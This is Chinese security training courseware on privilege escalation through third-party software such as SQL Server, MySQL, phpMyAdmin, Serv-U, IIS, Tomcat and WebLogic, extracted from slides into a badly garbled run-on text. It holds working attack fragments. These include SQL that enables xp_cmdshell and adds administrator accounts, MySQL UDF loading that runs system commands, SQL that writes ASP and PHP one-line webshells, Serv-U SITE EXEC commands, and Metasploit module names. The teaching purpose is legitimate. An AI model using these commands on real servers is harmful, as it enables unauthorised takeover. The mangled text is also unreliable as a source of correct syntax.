实验课件三方应用提权

溢出攻溢出攻击与提启明星辰培训认证部—王新目目提权演提权演示——SQL3提权演提权演示——运行SQLTools，输入目标服务器IP、用户名和4提权演示提权演示——（在客户端SSMS中执行EXECsp_configure'showadvancedoptions',1--RECONFIGUREWITHOVERRIDE-EXECsp_configure'xp_cmdshell',1-EXECsp_configureoptions',0--5提权演示——dbccaddextendedproc提权演示——dbccaddextendedprocdbccaddextendedproc("xp_cmdshell","xplog70.dll")沙盒提权：（更多命令参考‘SQL修复资料.txt’）execmaster..xp_regwriteSelect*••••••windows\system32\ias\ias.mdb','selectusersql$123/add")');Select*From•windows\system32\ias\ias.mdb','selectlocalgroupadministratorssql$6提权演提权演示——7提权演提权演示——混客SQL利用工具8提权演示——提权演示——点“设置”，连接SQL9提权演提权演示——提权演提权演示——提权演示——提权演示——利用日志增量备份写入一句话';alterdatabasevenussetRECOVERYFULL--';createtablecmd(aimage)--';backuplogvenustodisk='f:\cmd'with-';insertintocmd(a)values';backuplogvenustodisk‘c:\www\shell.asp'-••••••提权演提权演示——提权演提权演示——提权演示——提权演示——提权演示——提权演示——••mysql>usemysql>updateusersethost='%'wheremysql>flushC:\ProgramFiles\MySQL\MySQLServer••提权演示——提权演示——Usecreatetablevenus_tmp(cmdinsertintovenus_tmpvalues("<%executerequest("textarea1")%>");select*venus_tmpintoMySQL——udf提权步Udf.php已经将udf.dll以二进制的形式集成进了phpMySQL——udf提权步Udf.php已经将udf.dll以二进制的形式集成进了phpudf提权命createtablet_tmp(abcudf提权命createtablet_tmp(abcinsertintot_tmp••••••createtablet_tmp(dataLONGBLOB);insertintot_tmpvalues("");updatet_tmp ••select*fromt_tmpintodumpfilecreatefunctioncmdshellreturnsstringsoname'udf.dll';selectcmdshell('netuseraa/add');droptableifexists•••••select*fromt_tmpintodumpfileudf提权命要注意命udf提权命要注意命令中的字符都是英文字//版selectselect//版//查看mysql安装路show//看各种变量ADS与ADS与对于5.1以上版本，默认不存在\lib\pluginselect'xxx'intooutfileMysql提Mysql提Udf提Udf提权-linux平createtablet_tmp(datainsertintot_tmpupdatet_tmpset ;Udf提权-linux平Udf提权-linux平3.得到plugin目showvariableslikeplugin_dir/usr/local/mysql/lib/mysql/pluginselectdatafromt_tmpintoDUMPFILECREATEFUNCTIONsys_evalRETURNSstringSONAME'lib_mysqludf_sys.so';selectsys_eval('ls-l•••••••••提权演提权演示——useuseauxiliary/scanner/mysql/mysql_versionuseauxiliary/scanner/mysql/mysql_loginuseauxiliary/scanner/mysql/mysql_hashdumpuseauxiliary/admin/mysql/mysql_enum（CVE-2012-2122MySQL验证绕过，256••Phpmyadmin提权思Phpmyadmin提权思CreateTABLEvv(cmdtextNOTNULL);InsertINTOvv(cmd)VALUES('<?phpselectcmdfromvvintooutfileDropTABLEIFEXISTSvv;•••••••Phpmyadmin提权思createtablePhpmyadmin提权思createtabletemp_mix(datainsertintotemp_mixvalues••••updatesetselect*fromtemp_mixinto'C:\\Windows\\System32\\udf.dll';-- createfunctioncmdshellreturnsstringsonameselectcmdshell('netuseraa/add');droptableifexiststemp_mix;••••Oracle提默Oracle提默认用户scott/tiger，具有resource利用sql注入将scott提权至创建PL/SQL过程执行系统命execmongodbmongodb提PHPMoAdmincurl"/moadmin.php"-d提权提权演示——制权提权演提权演示——破解很简单提权演示——••提权演示——••经典的输入法漏洞，SQLServer•••提权演提权演示——端口可以利用4899弱口令扫描器扫出弱口提权演示提权演示——端口提权演提权演示——提权演提权演示——利用vnc_passview获取vnc的管理口提权提权演示——Serv-利用X-Scan发现Serv-U的一个弱口：Amdin+admin，此账户有执行权提权命令QuotesiteexecnetusertestQuotesiteexecnetlocalgroupadministratorstest/add提权演提权演示——Serv-提权演提权演示——Serv-提权演提权演示——Serv-默认管理账户默认管理密码默认绑定提权演提权演示——Serv-两种提权办法一是利用提权演提权演示——Serv-两种提权办法提权演提权演示——Serv-远程连接时注意端口填写fpipe打开提权演示——Serv-提权演示——Serv-下载文件提权演示——Serv-提权演示——Serv-CdLcdPutServUDaemon.ini账户权限：e—执行pHfs-2.x远Hfs-2.x远程代码执Hfs2.3DFileZilla提FileZilla提提权演提权演示——IIS权限不提权演提权演示——IIS写权限利利用IISPUTScaner可以批量扫描提权演提权演示——IIS写权限利工具：老兵的IIS写权限利用工Options选项可以查看IIS支持的操提权演提权演示——IIS写权限利利用PUT直接写一个一句话木提权演提权演示——IIS写权限利再用MOVE命令将test.txt修改为提权演提权演示——IIS写权限利成功利用一句话后提权演示——IIS6解提权演示——IIS6解析漏1.muma.asp;jpg文件名有分号路径名含有有个条件：文件上传后，不会被重命提权演示提权演示——IIS7提IIS7的提权0day，针对MS10-065-KB2124261-KB2271195-CVE-2010-提权提权演示——Tomcat漏洞Tomcat漏洞利用工ApacheTomcatCrack自动化攻击工具Tomcat批量Tomcat批量抓鸡工提权演提权演示——Deployments>ManageDeployments>Add提权演提权演示——远程代码执行phpjboss.php2提权演提权演示——远程代码执行，工具JexBoss-JbossverifyandEXploitation提权演提权演示——Java反序列化，远程代码执行提权演提权演示——Java反序列化，反弹提权演提权演示——提权演提权演示——提权演提权演示——WebLogicServerAdministrationConsoleworkshopDeploymentsWeb•••••••••提权提权演示——Elasticsearch提Elasticsearch提Elasticsearch远程代码执paddingpaddingPaddingoracle(MS10-070)漏洞检测信息泄露、敏感文件读取，例如paddingpadding查看源码搜索WebResource.axd，找到然后，利用padBuster.pl计算Web.configZKonHQe3MWyTFog2IVA9Sj-ZKonHQe3MWyTFog216-encoding3-plaintext"|||~/Web.config“paddingpaddingrLCZG3p5Vx7zNIkXvQHI9QAAAAAAAAAAAAAAAAAAAAA116得到最终的秘钥：（时间比较长提权示提权示例——搜狗拼搜狗拼音有一个问题提权示提权示例——搜狗拼此目录下有一个升级程序提权示例——CVE2012-提权示例——CVE2012-cve:2012-useSetSetlhost提权示例——JavaRMI提权示例——JavaRMIServerInsecureDefaultJavaCodeExecutionuseSet提权示例——提权示例——提权提权示例——Solaris10条件：Solaris10/11的telnet服务开命令：telnetlfroot可以绕过验证直接以root身份登vsFTPsmilefacetelnetvsFTPsmilefacetelnetpass另一个终端:-(注意分telnetcat提权演示—Apache解析提权演示—Apache解析漏ext2和ext1没有定从后向前依次按扩展名尝试解析文提权演提权演示——红色为手工添加的部分,图片被作为脚本解析提权演提权演示——Nginx的%00解析漏洞低版本nginx,可以在文件名后面，添加php-cgi默认php-cgi默认配置漏IISNginxCGIphp的web应用程序，而Apache